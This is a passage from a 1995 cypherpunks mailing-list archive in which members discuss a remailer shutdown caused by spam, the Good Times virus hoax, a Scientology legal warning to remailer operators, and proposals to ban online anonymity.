who sent the mail that I would send him a number of pieces of documentation 
about the fact its a hoax.  There was a NASA newsletter a few months back 
about it.  I deleted it, because I thought I'd never need it again.  
	Does anyone know where I might get a copy of that or another press 
release about the Goot Times hoax?
	I'd appreciate any help.  Thnax,

Brad

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                      bshantz@spry.com
Senior Software Engineer
SPRY Inc.                        Direct #:     (206)-442-8251
Seattle, WA 98104                WWW URL: http://WWW.SPRY.COM
----------------------------------------------------------------------
PGP Public Key at:    http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email:             pgp-public-keys@pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Wed, 4 Jan 95 14:05:43 PST
To: cypherpunks@toad.com
Subject: Re: who?
In-Reply-To: <199501042110.NAA27459@jobe.shell.portal.com>
Message-ID: <Edn2laa0iYxF076yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Jan 1995 13:10:45 -0800, anonymous-remailer@shell.portal.com wrote:

>  ps, how come mail i send to jpiunix.com is getting bounced, are they down?

Regrettably, it appears jpunix.com is down permanently.  I can't fault John
at all, and want to thank him for running a robust remailer for as long as
he was able.  I captured this earlier today:
=============================================================================
From: perry@jpunix.com (John A. Perry)
Newsgroups: alt.privacy.anon-server,alt.anonymous
Subject: Re: Jpunix "unknown"?
Date: 4 Jan 1995 06:55:22 -0600
Organization: J. P. and Associates

In article <doumakesD1v7EA.C63@netcom.com>,
Don Doumakes <doumakes@netcom.com> wrote:
>I've gotten several pieces of mail returned from jpunix.  Is it down
>permanently, or is this just a temporary problem?

Here is the test of a message I sent to remailer-operators:

The anonymous remailer at jpunix.com is going to shut down 
permanently shortly after I send this message. I spent my holidays 
fighting spams, running out of disk space because of spams and people 
sending HUGE binaries, and running out of swap space.

I have come to the ultimate conclusion that the Internet is not
mature or developed enough for remailers. The intended purpose has been
completely ignored while abuse is growing almost geometrically on a daily
basis. I have concluded that running a remailer on the Internet is like
giving a bunch of terrorists a nuclear bomb and then telling them "But
only use it for good!". There just doesn't seem to be much point in
thrashing my disks and computer to aid somebody in net abuse. I hardly
ever (never) see any use of the remailer for the purposes it was intended. 

BTW as I type this, mailgate.mail.aol.com is hammering my port 25 every 
30 seconds. The contents of the spam being passed thru my system 
essentially says:

          THIS IS A MAIL BOMB!!
          **** BOOM ***
=============================================================================

Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwsa7VRRFMq4NZY5AQEC7QP/SsfagBISP7k+0en0MeJpTPD56BNv0xGX
Fh80FuzJ/8Ya7Z4ykz8C1zTtXUaKJeIMgGbQkwybYveOGY5eZWgkc62r+FjmW6fh
JY2WhI7e0w+NpfjLBktr+deBvy3b9ElXfbiObfftZMZX/yVke7KX7p7hhdK8t7/g
vVj+TqEMhGU=
=GnaX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Wed, 4 Jan 95 13:22:59 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: regards to legal attempt to stifle remailers
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <Pine.3.89.9501041555.E175-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



After reading the post from teh Scientologists about lockout out groups 
form anon-remailers, I was thining a little bit, note I said a little bit 
this isnt a fully fleshed out idea yet.  I was thinking it may be smart 
for osme of the remailers to lock out the groups, in particular those 
operators who do it forma student acount, or perhaps from their own 
account in teh United states where legal action would be able to reach 
them.  But to get around this, the anon users can use the Finland server, 
or a new and imporoved anon-remailer.  By shopping around for ISPs it is 
possible to find a provider who takes payment thru mail and doesnt 
require positive ID to set up an account.  With this you then either run 
that account as the remailer, a totally anon account not linked to your 
person and thus immune from legal actions(besies having it closed by the 
ISP if they are pressured) or you can run a SLIP connection and runa  
remailer much like Julf's on your own machien thru a dedicated SLIP line. 
 


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 4 Jan 95 15:24:17 PST
To: cypherpunks@toad.com
Subject: Re: who?
Message-ID: <199501042324.PAA14631@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


 i'm sorry to hear the jpunix remailer is down for good--  why can't

people learn to be more fuckin responsible! i guess this is just yet 

another inconvenience we can tank terrorists for and those aol-holes!


   anybody know the email address of the good samaritans?

tia




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Wed, 4 Jan 95 15:45:24 PST
To: cypherpunks@toad.com
Subject: Re: The Good Times virus ...
Message-ID: <199501042346.PAA03355@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to the people who've sent me copies of the CIAC announcement.  That 
should cover my needs for right now.

Hopefully I can convince these people not to worry.

-- brad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Harris Baumstein <avi@clas.ufl.edu>
Date: Wed, 4 Jan 95 12:46:33 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501041600.AA07488@xs1.xs4all.nl>
Message-ID: <199501042047.PAA06797@cutter.clas.ufl.edu>
MIME-Version: 1.0
Content-Type: text/plain



nobody writes a very nice, non-confrontational and well thought out
letter supporting his case (and ignoring the oddness of copyrighting
religous materials). but i have some questions that weren't discussed
when i took business law 101 a few years ago:

nobody@replay.com (Name withheld on request) writes:

>     applicable.    Damages  and  an  injunction  against  further
>     unauthorized copying and distribution may be obtained against
>     infringers and, all unauthorized copies and all materials and
>     equipment by which the unauthorized copies may be  reproduced
>     can   be   impounded.    Unauthorized   disclosure   of   the
>     confidential  Advanced  Technology  materials  also  violates
>     applicable trade secrets laws.

i know there has been much chatter on this subject, but are there
truly any precedents that could hold on the anonymous distribution of
copyrighted material? are remailer-ops truly in legal danger?  what
exactly constitutes a trade secret, and what sort of laws apply?

>    clients'  property   rights.    Courts   are   holding   such
>    contributory  infringers  liable.   Two  examples  are:  Sega
>    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>    1152 (M.D.  Fla.  1993).

what of these cases? is this just an example of typical lawyerly
intimidation tactics? how do you remailer-ops plan to react? my first
instinct (were i running a remailer) would be to ignore it, on grounds
that i wouldn't examine any mail passing through. but if there really
were valid precedent in this matter... (has anyone seen any
well-written lay-person evaluations of the steve jackson case? i read
the ruling, but much of it went in one eye and out the other).

i think the censorship thing is building steam, and we should start
preparing (and informing) ourselves...

-avi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 3 Jan 95 21:06:46 PST
To: cypherpunks@toad.com
Subject: Re: San Francisco Editorial
In-Reply-To: <Pine.SUN.3.91.950103221256.28053B-100000@unix3.netaxs.com>
Message-ID: <Pine.SUN.3.91.950104160400.9369A-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Michael Handler wrote:

> 	Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to 
> cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies.
> He was promptly beaten down by the net. Feh.

He was also the one who presented a convincing argument that the one
who posted the alleged transcript was none other than Julf himself; he
(Dick) was getting responses from the perpetrator faster than the
delayed-response mechanism would have allowed...

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Thu, 5 Jan 95 00:25:20 PST
To: cypherpunks@toad.com
Subject: Remailers, law and the Church of Scientology
Message-ID: <199501050035.AA02970@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

AvI Harris Baumstein writes:

>>    clients'  property   rights.    Courts   are   holding   such
>>    contributory  infringers  liable.   Two  examples  are:  Sega
>>    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>>    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>>    1152 (M.D.  Fla.  1993).

>what of these cases? is this just an example of typical lawyerly
>intimidation tactics?

Neither case is particularly similar to the remailer situation.
_Maphia_ concerned a business which sold $350 boxes to copy
SEGA programs from and to ROM cartridges; they also sold access
to their BBS which held unlicensed copies of SEGA games. The
court held that the copying devices had no purpose other than to
contribute to infringement, and that when SEGA programs were 
uploaded to the BBS, the upload was made with the knowledge of the
defendants. _Frena_ involved a BBS operator who made copyrighted
pictures from Playboy available on his BBS; Playboy trademarks
were removed from the pictures prior to posting. Access to the
BBS was only available to people who paid for access, or who
otherwise did business with the defendant. The court's discussion
about the defendant's mental state in _Frena_ consists of a 
single sentence, and a cite to Jay Dratler, Jr., "Intellectual
Property Law: Commercial Creative, and Industrial Property",
$ 6.01[3] at 6-15(1991). The court seems to be addressing direct,
not contributory infringement. (I don't have Dratler available
easily right now so I dunno what it says.)

_Maphia_ does cite text from _Casella v. Morris_ 820 F.2d 362 (11th
Cir. 1987): "'[o]ne who, with knowledge of the infringing activity,
induces, causes or materially contributes to the infringing conduct
of another' may be held liable as a contributory infringer." (quoting
from _Gershwin Publishing Corp. v. Columbia Artists Management, Inc._,
443 F.2d 1159,1162 (2nd Cir. 1971).

I don't think the cases cited stand for what the Church's attorney
says they stand for. I'm not convinced that the "contributory 
infringement" doctrine can be reasonably applied to remailer 
operators; and I'm not sure that remailer operators have the sort
of mental state (knowledge) required to create liability. The
letter to operators may be part of a strategy to establish 
knowledge of the potential for misuse, to later prevent 
operators from claiming a lack of knowledge. I'm not sure that
a vague warning "someone might use your service to infringe
a copyright" is strong enough to establish that sort of knowledge.
As a remailer operator, I don't see a good way to eliminate
infringing uses without also eliminating non-infringing uses;
the crazy politics around this Scientology stuff makes it seem
like the perfect place for people to use remailers. 

I also think the non-commercial and political nature of postings
to the Scientology groups may make a fair-use analysis turn out
differently than in _Maphia_ and _Frena_; both defendants tried
a fair use argument, and both lost. 

On the other hand, I'm a law student, not an attorney, and the
person who wrote that letter certainly knows more about law in
general and about copyright than I do. I may be totally hosed.

Coincidentally or not, I had a long chat today with the sysadmin
of the system immediately upstream from mine. He said, out of
the blue, "So .. you run a remailer?". In the past he has been
privacy-friendly and anon-friendly, and seems to remain so 
today, but the timing was a little peculiar. I explained about
the remailers and told him how to get Raph's list and about
alpha.c2.org and all the rest of it. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLws+TH3YhjZY3fMNAQEpmgP+JnIZKmdzLWx3P8fMVO0v1pEZ33lrlHHe
FLZBnk59rDXZBomFhprlZAs65ERmKBbugXRJYkPhFA7aKYqcmpquGj6BqWp0oTul
SjHS3OWpsDJhPVEWzt5uOhlV5WrDdhqUWgrI9hN1nfLHnD/Y2NGvPPUt4J2Web/H
uD9htAdxH8o=
=U4oG
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 15:21:02 PST
To: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Subject: Remailer Abuse
In-Reply-To: <Edn2laa0iYxF076yn@ouray.denver.colorado.edu>
Message-ID: <9501042320.AA07624@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



The problem with a _free_ remailer is obvious -- like many
other Internet resources, it can suffer from the tragedy of
the commons. 

Even a negligible fee would do much to prevent gross remailer
abuse. It may not be feasible to make remailers in to an
industry, but this isn't the point -- it will keep the utterly
lame from using it for pranks and their ilk.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:45:21 PST
To: Hal <cypherpunks@toad.com
Subject: Re: San Francisco Editorial
Message-ID: <ab30c5b8010210041844@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:44 PM 01/03/95, Hal wrote:
>The scary thing about cancels is that some proposals have actually been
>directed at anonymous posts themselves.  Someone anonymously posted
>what purported to be a grisly transcript of the last seconds of the
>doomed Challenger crew as they fell to the ocean.  This caused a great
>hue and cry and some calls for banning anonymous posts and/or
>retroactively cancelling them.  This led to some very amusing events
>which Detweiler has chronicled in his FAQ on anonymity, the net result
>of which was that the idea was discredited.  But the emergence of
>CancelMoose is not an altogether positive event in my view.

I too have mixed feelings about CancelMoose.  But it must be noted, that
while it's possible for CancelMoose to be used for Evil Purposes, it
hasn't.  This isn't a trivial point.  The net collectively (well, it wasn't
really collective, but I suggest if this individual anonymous CancelMoose
hadn't existed, someone else would have done it) responded to something
that it's nearly universally agreed upon is bad; C&S-style spamming.  That
is an example of an anarchist non-hierchical system _working_, despite the
lack of rules.  And the widespread cancelling of anonymous posts, or posts
from communists or whatever, _hasn't_ happened.  And if someone tried it, I
bet it wouldn't work for long, something would be done to stop it.  An
anti-cancelbot that reposts anything cancelled by the Evil Censoring
Cancelbots, or something.  (Why haven't C&S thought of this themselves?
Would really create havok with all the cancels and anti-cancels and
re-cancels, etc.)

I dont' think Martha Siegel really understands what's going on (not a
surprise).  She is speaking out against a lawless anarchist net, and saying
we need more rules.  Because she's mad at people cancelling her posts,
mainly.  But it seems completely obvious that if we _did_ have rules, they
would prohibit the kind of really horrible spams she and her husband have
been undertaken.  Because 99.99% of the net agrees that those spams are
really bad.

But, like I said, such rules aren't even neccesary.  The net collectively
reacts. And there will be a counter reaction, C&S will figure out how to
get around the cancelbots, or the cancelbots will be used for Evil, or
whatever. But I believe firmly that that would cause yet another counter
reaction of some kind. And so on and so on. The net will stay at
equilibrium.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 13:46:49 PST
To: cypherpunks@toad.com
Subject: Re: Siegel and Lewis
Message-ID: <ab30c81703021004a6f1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:22 PM 01/03/95, Raph Levien wrote:
>   His piece that ran Saturday was badly mangled by the editorial
>process, especially since it ran on page one. Those articles get to be
>mangled by a whole new set of people who otherwise wouldn't get to
>touch it. I think Lewis has basically good intentions, and does do his
>homework before writing a story.

Yeah, I encourage everyone to actually _finish_ reading that article before
putting Lewis on your permanent hate list.  I almost put it down in
disgust, from the stuff on page 1, but if you turn to where the article is
continued, it becomes quite a bit more balanced and less fear-mongering.
In a rather disjointed sort of way, that makes it easy to beleive the
article was mangled somewhat in editing. Perhaps they rearanged it to put
the "sensational" fear-mongering stuff first.  Which is unfortunate, and
perhaps intentional, because most people probably won't make it to the end
of the article, and if they do, will have been pre-biased by the initial
paragraphs, especially if this is the first they've heard of the subject.
But I don't have too much trouble believing that all blame belongs on the
editors, and not Lewis. :)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 4 Jan 95 08:00:03 PST
To: cypherpunks@toad.com
Subject: Warning letter from Co$. [any comments ?]
Message-ID: <199501041600.AA07488@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



                                               January 3, 1995


     TO: INTERNET REMAILER OPERATORS


     FROM:  THOMAS M. SMALL
            COUNSEL FOR RELIGIOUS TECHNOLOGY CENTER AND BRIDGE
            PUBLICATIONS, INC.

          I  represent  Religious Technology Center ("RTC"), which
     owns the unpublished, confidential Advanced Technology of the
     religion of Scientology, and holds exclusive rights under the
     copyrights applicable to the Advanced  Technology  materials.
     I  also  represent Bridge Publications, Inc., which holds the
     exclusive  right  to  print,   publish   and   sell   various
     non-confidential  works  by  the  founder  of the Scientology
     religion,  L.   Ron  Hubbard,  and  to   make   and   publish
     compilations and derivative works of and from those works and
     to enforce all rights in them.

          It  has  come  to  my  attention  that  there  are   two
     alternate  newsgroups  on  the  Internet to which individuals
     have  been  annonymously  posting  certain  of  my   clients'
     published  and  unpublished  copyrighted materials, including
     certain of the confidential  Advanced  Technology  materials.
     These  confidential  materials  being posted were stolen from
     my client.  There is reason to  believe  that  the  materials
     which  are  uploaded by these users may also be downloaded by
     other users, and  that  these  activities  may  be  occurring
     through  the  systems  which  are  linked  into the Internet.
     The two newsgroups  into  which  these  materials  are  being
     copied    are   alt.technology.clearing   and   alt.religion.
     Scientology.

          We  request your assistance in dealing with the problem.
     The spread of  infringements  and  misappropriations  by  the
     users  will be lessened if you lock out from your systems the
     two   newsgroups   involved,   alt.religion.scientology   and
     alt.technology.clearing, limiting the potential for reposting
     and downloading.  It will then be easier  to  deal  with  the
     intentional infringers through appropriate channels.

          Both  the  uploading  and downloading of these materials
     constitute  unauthorized  copying  and  distribution  of  the
     materials  in  violation  of our clients' rights under United
     States copyright laws and the law of other  countries,  where
     applicable.    Damages  and  an  injunction  against  further
     unauthorized copying and distribution may be obtained against
     infringers and, all unauthorized copies and all materials and
     equipment by which the unauthorized copies may be  reproduced
     can   be   impounded.    Unauthorized   disclosure   of   the
     confidential  Advanced  Technology  materials  also  violates
     applicable trade secrets laws.

          Action  is  being  taken directly with the systems users
     who we know are primarily responsible for these violations of
     my clients' rights.  We hope those actions will put an end to
     the infringements by  these  users.   We  do  {not}  wish  to
     involve  others in  litigation.  Unfortunately, however, such
     actions will  be  unavoidable  where  there  is  contributory
     infringement  by  those who knowingly induce or contribute to
     the infringing conduct of these users by providing facilities
     or systems that enable the  direct  infringers  to  infringe,
     because  we  legally  must  take  all  actions to protect our
     clients'  property   rights.    Courts   are   holding   such
     contributory  infringers  liable.   Two  examples  are:  Sega
     Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
     Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
     1152 (M.D.  Fla.  1993).

          Recent   proposed   legislation   regarding    potential
     liability   of  systems  operators  and  others  who  provide
     facilities or services, such  as  annonymous  remailers,  for
     information  passing through their systems has understandably
     created concern  on  the  part  of  systems  operators  as  a
     potential  liability.   We  ask  your voluntary assistance in
     dealing with these known wilful infringers  so  that  we  can
     both  deal  with the problem without legal hassles, and legal
     liability can be confined to those who intend to  create  the
     situation.

          We  ask that you confirm that you have blocked access to
     these newsgroups through your remailer.  If you are unwilling
     to  do  so,  we  ask that you inform us as to the reasons for
     your position.

                                             Sincerely,



                                             Thomas M. Small




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 4 Jan 95 17:30:07 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Outlawing Anonymity
In-Reply-To: <Pine.SV4.3.91.950104191626.17118E-100000@xcalibur>
Message-ID: <199501050126.RAA01575@netcom12.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Cooper wrote:
> 
> > Criminalize anonymity, and tell the internet providers to figure
> > out how to enforce it or face confiscation.
> 
>    Which would probably amount to sniffing all packet traffic.
> 
>    If that ban was implemented, so would ways around it be implemented.  
> I would prefer that they not need to be invented but if they must be, 
> they will be.

This same topic--the outlawing of anonymity and anonymous
remailers--is also being debated on the Cyberia list, as many of you
know. (Timely, I guess, because of the Siegel comments, the Lewis
article, and the Church of Scientology threats.)

The ways around such a ban are so patently obvious that any such "ban"
is unenforceable. I wrote a piece on this for the Cyberia list, but
this was my single most important point:

If anonymous mail is outlawed, then the anonymous mailers can attach
real names. To wit, all mail from a famous remailing site in the
Netherlands could be marked as being from "Hans Brinker." This would
presumably meet the letter of the law, if not the "spirit." (I always
did hate this "spirit.")

Further, sites which "forward" anonymous mail, or mail from "Hans
Brinker," are in most cases precluded by the ECPA from screening this
mail or otherwise examining it.

I see no prospect whatsover that a ban on anonymous mail could be
implemented, enforced, or upheld in the courts.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Wed, 4 Jan 95 15:17:09 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 3 Jan 1995, Jonathan Cooper wrote:

> >    Martha Siegel is just fucked up enough that she will probably push
> > for legislation regulating the nets. Congress is just fucked up that
> > they might pass it.
> 
>    And if they do I will make it a definate point to do all I can to 
> emigrate to the UK, the Netherlands, or somewhere else.
> 
>    This country is increasingly becoming a police state, and I've got too 
> many years of life left to just passively deal with it.

As I understand it, the government owns a portion of the internet. What 
they want to regulate about that is their business. What I want to know 
is how can they regulate what private business and citizen's do with 
there Fiber Optic's, ISDN lines, telephone lines, and computers. If the 
government was to ban anything on the net, it would shurly seem to me to 
be in violation of the first ammenment. Things like pirated software, 
being illegal already, is one thing, but our mail, conversations, ect. is 
diffrent. 

	Does anyone have any information on what grouds Seigel and Lewis 
plan to use for legislation? If they do pass laws regulating the 'net I 
hope someone comes up with a no-spamming law, then I am getting a ticket 
on Jon Coopers plane out of the country. 

						Groove on Dude
						Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 4 Jan 95 15:07:09 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <199501042312.SAA03816@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501042047.PAA06797@cutter.clas.ufl.edu>,
Avi Harris Baumstein <avi@clas.ufl.edu> wrote:
>i know there has been much chatter on this subject, but are there
>truly any precedents that could hold on the anonymous distribution of
>copyrighted material? are remailer-ops truly in legal danger?  what
>exactly constitutes a trade secret, and what sort of laws apply?

This is oddly timely.  The LaMacchia decision showed that providing a
service for others to use for the distribution of copyrighted material
(in his case, copyrighted software) was not prosecutable under Wire
Fraud statutes.  The judge told the Feds, "no dice.  Stop trying to
applying laws to areas where they weren't intended."

Civil matters are another matter, of course, but that's one avenue
that's closed.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwrwjBNhgovrPB7dAQHIYAP6AtRFkIqOj+vRPxUPLdGaUK9t9/pZQi8g
6HyXHBjaEA9ygX8ALQEbS3AK1a1DsqWIsOxXVivszfEY+1lmS3w93VnICjigebbf
YuHpFOOgyf8IkUBslov1V7Pw0/X/blMVspyc1nDigK3KsyMi7PalAw5ECECqkhkD
AizVLOZNrO0=
=yOiL
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwsrTyoZzwIn1bdtAQH9xAF/dFkiStD+csfx4ATJ76WaxrfcLPEYej+p
Ec55BXkOYH+96xGLHugficY5hRjtL5eL
=LPEW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 4 Jan 95 16:11:42 PST
To: cypherpunks@toad.com
Subject: Re: British Hacker Article
Message-ID: <9501042343.AB19355@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:31 PM 1/4/95 -0500, Duncan Frissell wrote:
>>From The Independent (London) Tuesday 3 January 1995 - Front Page

> ... The US Defence Information
>Systems Agency admitted in a private briefing, which has been confirmed,
>that the hackers had affected the Department's "military readiness."

"Admitted"?  Probably "complained without substaniation" would be more accurate.

> ...  It is understood that
>he invented a "sniffer" programme which searched across hundreds of
>computers attached to the Internet for passwords and user names. ...

If he was really behind the various password sniffers running on Netcom, 
etc, he has a lot of explaining to do.

> ...  "They contained information about
>firing sites in North Korea and stuff like that.  Field intelligence.  He
>kept detailed logs of communication traffic.  ... The Korean files were on 
>the Girths Air Force Base computer system and therefore the could have been 
>accessed.  ...

Harumpf.  Either the stuff wasn't classified, or else someone had a major 
security procedures breach and had classified material sitting on a computer 
with an uncrypted comm link.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:21:19 PST
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <Qj2fAKT0Eyt5BUJxh8@nsb.fv.com>
Message-ID: <Pine.SV4.3.91.950104190752.17118D-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> A letter to the editor is like spitting into the wind in this case.   I
> think what's needed is a more constructive affirmative action, ideally
> taking Cantor and Siegel to court somewhere.

   Perhaps it's my libertarian outlook, perhaps not, but I tend to abhor 
using the US government's ``legal'' system for almost any reason.  

   The worst thing about doing this (suing them), IMHO, is that if you 
lost you would create a precedent for all the people who aren't doing it 
because they might consider it illegal or immoral -- far too many people 
consider things that the court okays to be morally okay.  

   Instead, I think it's a great stimulus for better software - there's 
no reason to sue them when it'd be a better thing for the community if 
newsreaders and mailreaders were enhanced to deal with spams.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:27:25 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Regulatory Risks
In-Reply-To: <Pine.3.89.9501041009.A14363-0100000@netcom10>
Message-ID: <Pine.SV4.3.91.950104191626.17118E-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Criminalize anonymity, and tell the internet providers to figure
> out how to enforce it or face confiscation.

   Which would probably amount to sniffing all packet traffic.

   If that ban was implemented, so would ways around it be implemented.  
I would prefer that they not need to be invented but if they must be, 
they will be.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:29:09 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SUN.3.91.950104135455.7622A-100000@access3.digex.net>
Message-ID: <Pine.SV4.3.91.950104191751.17118F-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I tend to focus on the subject matter economist prints.  I just find it 
> more on target than most if not all of the major U.S. media sources.

   I find _Reason_ quite excellent as well.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:37:41 PST
To: Michael Conlen <meconlen@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950104192503.17118H-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> As I understand it, the government owns a portion of the internet. What 

   Yes.  And through my work's upcoming link, so will they.  So what?

> they want to regulate about that is their business. What I want to know

